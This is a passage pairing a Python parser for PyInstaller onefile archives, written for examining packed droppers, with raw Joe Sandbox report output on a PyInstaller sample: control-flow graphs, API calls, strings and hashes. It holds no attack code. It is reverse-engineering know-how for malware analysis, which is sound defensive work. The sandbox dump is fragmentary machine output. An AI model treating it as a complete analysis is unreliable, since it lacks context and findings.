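COOKIE_FMT = "!8sIIii64s"                  # magic, package length, TOC offset, TOC length, python version, python DLL name
COOKIE_LEN = struct.calcsize(COOKIE_FMT)   # 88 bytes
ENTRY_FMT = "!iIIIBc"                      # entry length, data offset, compressed length, uncompressed length, flag, type code
ENTRY_LEN = struct.calcsize(ENTRY_FMT)     # 18 bytes, followed by the NUL-terminated entry name
TYPE_NAMES = {b"s": "script", b"z": "PYZ", b"b": "binary", b"x": "data",
              b"m": "module", b"M": "package", b"o": "option"}


def find_cookie(blob):
    """Offset of the cookie magic, or -1.  The bootloader code itself also contains
    the magic (it scans for it), so the cookie proper is the last copy in the file."""
    return blob.rfind(PYI_MAGIC)


def parse_archive(blob):
    """Parse the package appended to a bootloader; returns (pyver, pylib, entries).

    TOC data offsets are relative to the start of the package, and the package
    length in the cookie covers data + TOC + cookie, so the package start is
    computed backwards from the cookie.  Bytes after the cookie are tolerated."""
    cookie_pos = find_cookie(blob)
    if cookie_pos < 0 or cookie_pos + COOKIE_LEN > len(blob):
        raise ValueError("no complete PyInstaller cookie found")
    _magic, pkg_len, toc_off, toc_len, pyver, pylib = struct.unpack_from(COOKIE_FMT, blob, cookie_pos)
    pkg_start = cookie_pos + COOKIE_LEN - pkg_len
    if pkg_start < 0:
        raise ValueError("cookie claims a package larger than the file")
    entries = []
    pos, toc_end = pkg_start + toc_off, pkg_start + toc_off + toc_len
    while pos < toc_end:
        entry_len, data_off, clen, ulen, flag, code = struct.unpack_from(ENTRY_FMT, blob, pos)
        name = blob[pos + ENTRY_LEN:pos + entry_len].rstrip(b"\x00").decode("utf-8", "replace")
        data = blob[pkg_start + data_off:pkg_start + data_off + clen]
        if flag:                                   # flag 1: zlib-compressed entry
            data = zlib.decompress(data)
        if len(data) != ulen:
            raise ValueError(f"size mismatch in TOC entry {name!r}")
        entries.append({"name": name, "type": TYPE_NAMES.get(code, code.decode("latin-1")),
                        "compressed": bool(flag), "size": len(data), "data": data})
        pos += entry_len
    return pyver, pylib.rstrip(b"\x00").decode("utf-8", "replace"), entries


def build_sample_archive(entries, pyver=311, pylib=b"python311.dll"):
    """Write a package in the same layout (16-byte padded TOC entries).  Used here
    only to construct test data for the parser."""
    data, toc = bytearray(), bytearray()
    for name, code, payload, compress in entries:
        stored = zlib.compress(payload) if compress else payload
        nm = name.encode("utf-8") + b"\x00"
        entry_len = ENTRY_LEN + len(nm)
        entry_len += (-entry_len) % 16
        toc += struct.pack(ENTRY_FMT, entry_len, len(data), len(stored), len(payload), int(compress), code)
        toc += nm.ljust(entry_len - ENTRY_LEN, b"\x00")
        data += stored
    toc_off = len(data)
    pkg_len = len(data) + len(toc) + COOKIE_LEN
    cookie = struct.pack(COOKIE_FMT, PYI_MAGIC, pkg_len, toc_off, len(toc), pyver, pylib)
    return bytes(data + toc + cookie)


# Constructed sample: a stand-in for the bootloader (not a valid PE, and it even
# carries a copy of the magic, as a real bootloader does) followed by a
# three-entry package.  This is not the report's sample.
CONSTRUCTED_ENTRIES = [
    ("pyi-contents-directory _internal", b"o", b"", False),
    ("launcher", b"s", b"import sys\nprint('constructed entry script')\n", True),
    ("PYZ-00.pyz", b"z", b"PYZ\x00constructed-archive-body", False),
]
SAMPLE_EXE = b"MZ" + b"\x00" * 62 + PYI_MAGIC + b"<bootloader stub>" + build_sample_archive(CONSTRUCTED_ENTRIES)


def entry_scripts(blob):
    """Names of type 's' entries: the scripts the bootloader runs first, which is
    where a PyInstaller-packed dropper's loader stub lives."""
    return [e["name"] for e in parse_archive(blob)[2] if e["type"] == "script"]


def runtime_options(blob):
    """Names of type 'o' entries, i.e. the pyi-* runtime options the bootloader parses."""
    return [e["name"] for e in parse_archive(blob)[2] if e["type"] == "option"]


if __name__ == "__main__":
    pyver, pylib, entries = parse_archive(SAMPLE_EXE)
    print(f"Python {pyver // 100}.{pyver % 100} ({pylib})")
    for e in entries:
        print(f"{e['type']:8} {'zlib' if e['compressed'] else 'raw':5} {e['size']:6d} {e['name']}")
```

Run against a real onefile binary, `entry_scripts` names the script to look at first and `parse_archive` hands back its decompressed bytes; the Python bytecode in a PYZ entry still has to be unmarshalled and decompiled separately, and the PyInstaller 2.0 cookie (24 bytes, no library name) is not handled. Note that trailing data after the cookie is accepted deliberately, since droppers sometimes append an overlay to a packed executable.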

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      control_flow_graph 465 7ff7ff5a69d4-7ff7ff5a6a47 call 7ff7ff5a6708 468 7ff7ff5a6a61-7ff7ff5a6a6b call 7ff7ff598590 465->468 469 7ff7ff5a6a49-7ff7ff5a6a52 call 7ff7ff594f58 465->469 475 7ff7ff5a6a86-7ff7ff5a6aef CreateFileW 468->475 476 7ff7ff5a6a6d-7ff7ff5a6a84 call 7ff7ff594f58 call 7ff7ff594f78 468->476 474 7ff7ff5a6a55-7ff7ff5a6a5c call 7ff7ff594f78 469->474 489 7ff7ff5a6da2-7ff7ff5a6dc2 474->489 479 7ff7ff5a6af1-7ff7ff5a6af7 475->479 480 7ff7ff5a6b6c-7ff7ff5a6b77 GetFileType 475->480 476->474 485 7ff7ff5a6b39-7ff7ff5a6b67 GetLastError call 7ff7ff594eec 479->485 486 7ff7ff5a6af9-7ff7ff5a6afd 479->486 482 7ff7ff5a6bca-7ff7ff5a6bd1 480->482 483 7ff7ff5a6b79-7ff7ff5a6bb4 GetLastError call 7ff7ff594eec CloseHandle 480->483 492 7ff7ff5a6bd3-7ff7ff5a6bd7 482->492 493 7ff7ff5a6bd9-7ff7ff5a6bdc 482->493 483->474 500 7ff7ff5a6bba-7ff7ff5a6bc5 call 7ff7ff594f78 483->500 485->474 486->485 487 7ff7ff5a6aff-7ff7ff5a6b37 CreateFileW 486->487 487->480 487->485 497 7ff7ff5a6be2-7ff7ff5a6c37 call 7ff7ff5984a8 492->497 493->497 498 7ff7ff5a6bde 493->498 503 7ff7ff5a6c56-7ff7ff5a6c87 call 7ff7ff5a6488 497->503 504 7ff7ff5a6c39-7ff7ff5a6c45 call 7ff7ff5a6910 497->504 498->497 500->474 511 7ff7ff5a6c89-7ff7ff5a6c8b 503->511 512 7ff7ff5a6c8d-7ff7ff5a6ccf 503->512 504->503 510 7ff7ff5a6c47 504->510 513 7ff7ff5a6c49-7ff7ff5a6c51 call 7ff7ff59ab30 510->513 511->513 514 7ff7ff5a6cf1-7ff7ff5a6cfc 512->514 515 7ff7ff5a6cd1-7ff7ff5a6cd5 512->515 513->489 516 7ff7ff5a6da0 514->516 517 7ff7ff5a6d02-7ff7ff5a6d06 514->517 515->514 519 7ff7ff5a6cd7-7ff7ff5a6cec 515->519 516->489 517->516 520 7ff7ff5a6d0c-7ff7ff5a6d51 CloseHandle CreateFileW 517->520 519->514 522 7ff7ff5a6d53-7ff7ff5a6d81 GetLastError call 7ff7ff594eec call 7ff7ff5986d0 520->522 523 7ff7ff5a6d86-7ff7ff5a6d9b 520->523 522->523 523->516
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1617910340-0
                                                                                                                                                                                                      • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                      • Instruction ID: c94df809199b81bb341f8ac31c980e2f54dd82e759c8744b17fa9702197ee3d6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DBC1DE36B29A8285EB10EF65C4902AC7761FB48B98F814335DA3E5B7D4DF38D421C3A0
APIs
Memory Dump Source
• Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0

Control-flow Graph
APIs
  • Part of subcall function 00007FF7FF587F80: _fread_nolock.LIBCMT ref: 00007FF7FF58802A
• _fread_nolock.LIBCMT ref: 00007FF7FF581A1B
  • Part of subcall function 00007FF7FF582910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7FF581B6A), ref: 00007FF7FF58295E
Strings
Similarity
• API ID: _fread_nolock$CurrentProcess
• String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
• API String ID: 2397952137-3497178890

Control-flow Graph

Strings
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012

Control-flow Graph

Strings
Similarity
• API ID: CurrentProcess
• String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
• API String ID: 2050909247-2813020118

Control-flow Graph

APIs
• FreeLibrary.KERNEL32(?,?,?,00007FF7FF59F11A,?,?,-00000018,00007FF7FF59ADC3,?,?,?,00007FF7FF59ACBA,?,?,?,00007FF7FF595FAE), ref: 00007FF7FF59EEFC
• GetProcAddress.KERNEL32(?,?,?,00007FF7FF59F11A,?,?,-00000018,00007FF7FF59ADC3,?,?,?,00007FF7FF59ACBA,?,?,?,00007FF7FF595FAE), ref: 00007FF7FF59EF08
Strings
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32(?,00007FF7FF583804), ref: 00007FF7FF5836E1
• GetLastError.KERNEL32(?,00007FF7FF583804), ref: 00007FF7FF5836EB
  • Part of subcall function 00007FF7FF582C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7FF583706,?,00007FF7FF583804), ref: 00007FF7FF582C9E
  • Part of subcall function 00007FF7FF582C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7FF583706,?,00007FF7FF583804), ref: 00007FF7FF582D63
  • Part of subcall function 00007FF7FF582C50: MessageBoxW.USER32 ref: 00007FF7FF582D99
Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                      • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                      • API String ID: 3187769757-2863816727
                                                                                                                                                                                                      • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                      • Instruction ID: f5f5644522468bfb6c97155f5e32020bca623684ed21aa1b6ac219ac407b73c0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4218391B19AC251FB20BB24E8043F6A290BF48755FC40332D57EC35E5EE2CE604C7A0

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 715 7ff7ff59bacc-7ff7ff59baf2 716 7ff7ff59baf4-7ff7ff59bb08 call 7ff7ff594f58 call 7ff7ff594f78 715->716 717 7ff7ff59bb0d-7ff7ff59bb11 715->717 731 7ff7ff59befe 716->731 718 7ff7ff59bee7-7ff7ff59bef3 call 7ff7ff594f58 call 7ff7ff594f78 717->718 719 7ff7ff59bb17-7ff7ff59bb1e 717->719 738 7ff7ff59bef9 call 7ff7ff59a950 718->738 719->718 721 7ff7ff59bb24-7ff7ff59bb52 719->721 721->718 724 7ff7ff59bb58-7ff7ff59bb5f 721->724 728 7ff7ff59bb61-7ff7ff59bb73 call 7ff7ff594f58 call 7ff7ff594f78 724->728 729 7ff7ff59bb78-7ff7ff59bb7b 724->729 728->738 734 7ff7ff59bb81-7ff7ff59bb87 729->734 735 7ff7ff59bee3-7ff7ff59bee5 729->735 736 7ff7ff59bf01-7ff7ff59bf18 731->736 734->735 739 7ff7ff59bb8d-7ff7ff59bb90 734->739 735->736 738->731 739->728 742 7ff7ff59bb92-7ff7ff59bbb7 739->742 744 7ff7ff59bbea-7ff7ff59bbf1 742->744 745 7ff7ff59bbb9-7ff7ff59bbbb 742->745 746 7ff7ff59bbf3-7ff7ff59bbff call 7ff7ff59d66c 744->746 747 7ff7ff59bbc6-7ff7ff59bbdd call 7ff7ff594f58 call 7ff7ff594f78 call 7ff7ff59a950 744->747 748 7ff7ff59bbe2-7ff7ff59bbe8 745->748 749 7ff7ff59bbbd-7ff7ff59bbc4 745->749 756 7ff7ff59bc04-7ff7ff59bc1b call 7ff7ff59a9b8 * 2 746->756 779 7ff7ff59bd70 747->779 751 7ff7ff59bc68-7ff7ff59bc7f 748->751 749->747 749->748 754 7ff7ff59bc81-7ff7ff59bc89 751->754 755 7ff7ff59bcfa-7ff7ff59bd04 call 7ff7ff5a398c 751->755 754->755 759 7ff7ff59bc8b-7ff7ff59bc8d 754->759 766 7ff7ff59bd0a-7ff7ff59bd1f 755->766 767 7ff7ff59bd8e 755->767 775 7ff7ff59bc38-7ff7ff59bc63 call 7ff7ff59c2f4 756->775 776 7ff7ff59bc1d-7ff7ff59bc33 call 7ff7ff594f78 call 7ff7ff594f58 756->776 759->755 763 7ff7ff59bc8f-7ff7ff59bca5 759->763 763->755 768 7ff7ff59bca7-7ff7ff59bcb3 763->768 766->767 772 7ff7ff59bd21-7ff7ff59bd33 GetConsoleMode 766->772 770 7ff7ff59bd93-7ff7ff59bdb3 ReadFile 767->770 
768->755 773 7ff7ff59bcb5-7ff7ff59bcb7 768->773 777 7ff7ff59bdb9-7ff7ff59bdc1 770->777 778 7ff7ff59bead-7ff7ff59beb6 GetLastError 770->778 772->767 780 7ff7ff59bd35-7ff7ff59bd3d 772->780 773->755 781 7ff7ff59bcb9-7ff7ff59bcd1 773->781 775->751 776->779 777->778 783 7ff7ff59bdc7 777->783 786 7ff7ff59bed3-7ff7ff59bed6 778->786 787 7ff7ff59beb8-7ff7ff59bece call 7ff7ff594f78 call 7ff7ff594f58 778->787 788 7ff7ff59bd73-7ff7ff59bd7d call 7ff7ff59a9b8 779->788 780->770 785 7ff7ff59bd3f-7ff7ff59bd61 ReadConsoleW 780->785 781->755 789 7ff7ff59bcd3-7ff7ff59bcdf 781->789 794 7ff7ff59bdce-7ff7ff59bde3 783->794 796 7ff7ff59bd82-7ff7ff59bd8c 785->796 797 7ff7ff59bd63 GetLastError 785->797 791 7ff7ff59bd69-7ff7ff59bd6b call 7ff7ff594eec 786->791 792 7ff7ff59bedc-7ff7ff59bede 786->792 787->779 788->736 789->755 790 7ff7ff59bce1-7ff7ff59bce3 789->790 790->755 800 7ff7ff59bce5-7ff7ff59bcf5 790->800 791->779 792->788 794->788 802 7ff7ff59bde5-7ff7ff59bdf0 794->802 796->794 797->791 800->755 807 7ff7ff59bdf2-7ff7ff59be0b call 7ff7ff59b6e4 802->807 808 7ff7ff59be17-7ff7ff59be1f 802->808 815 7ff7ff59be10-7ff7ff59be12 807->815 811 7ff7ff59be21-7ff7ff59be33 808->811 812 7ff7ff59be9b-7ff7ff59bea8 call 7ff7ff59b524 808->812 816 7ff7ff59be35 811->816 817 7ff7ff59be8e-7ff7ff59be96 811->817 812->815 815->788 819 7ff7ff59be3a-7ff7ff59be41 816->819 817->788 820 7ff7ff59be43-7ff7ff59be47 819->820 821 7ff7ff59be7d-7ff7ff59be88 819->821 822 7ff7ff59be63 820->822 823 7ff7ff59be49-7ff7ff59be50 820->823 821->817 825 7ff7ff59be69-7ff7ff59be79 822->825 823->822 824 7ff7ff59be52-7ff7ff59be56 823->824 824->822 826 7ff7ff59be58-7ff7ff59be61 824->826 825->819 827 7ff7ff59be7b 825->827 826->825 827->817
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                      • Opcode ID: ba46bac31fe72f1dd681b3566344db0dd8f54c3f22ac6e326a6392c95ac81308
                                                                                                                                                                                                      • Instruction ID: 83fa90cfd8c71e74b13d55bcc48a617426c8c0bf2705065cbd80c80d8286db5e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba46bac31fe72f1dd681b3566344db0dd8f54c3f22ac6e326a6392c95ac81308
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5C1B2229087CBA1F778AB1594402FDA764EB81B80F954331EA7E037E1CE7CE95583A0

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                      • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                      • API String ID: 2050909247-2434346643
                                                                                                                                                                                                      • Opcode ID: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
                                                                                                                                                                                                      • Instruction ID: f91ec75b9c3450c0b2a59517a70b53743fc71900d43145115887b6c67efab9cd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F415261A19AC791EB11FB21E4582E9A365FB44344FD00232EA7D436D6EF3CE615C7E0

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1279662727-0
                                                                                                                                                                                                      • Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                      • Instruction ID: ec10dbd66422ca27fc0225f291d354a09a4ba7456042b811a98854b9adaadf99
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74419622D187C283E768AB2095503B9A3A0FB94794F509335E67C03ED1DF7CA5F187A0

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3251591375-0
                                                                                                                                                                                                      • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                      • Instruction ID: ca1fae4b14fc585a347e055649a00323b0caa5b68d0e0ecf03e974bd0acde9c5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD313760E096C351FB24BB2594653F9AB92BF41784FC44634D97E4B2D3EE2CA409C2F0

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9CE
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9D8
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CloseHandle.KERNELBASE(?,?,?,00007FF7FF59AA45,?,?,00000000,00007FF7FF59AAFA), ref: 00007FF7FF59AC36
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7FF59AA45,?,?,00000000,00007FF7FF59AAFA), ref: 00007FF7FF59AC40
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseErrorHandleLast
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _fread_nolock
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 840049012-0
                                                                                                                                                                                                      • Opcode ID: 0fb7cb8cbc48f9e917e8c39a654de37bb9aab67e22ead0d73b96efd71e61a230
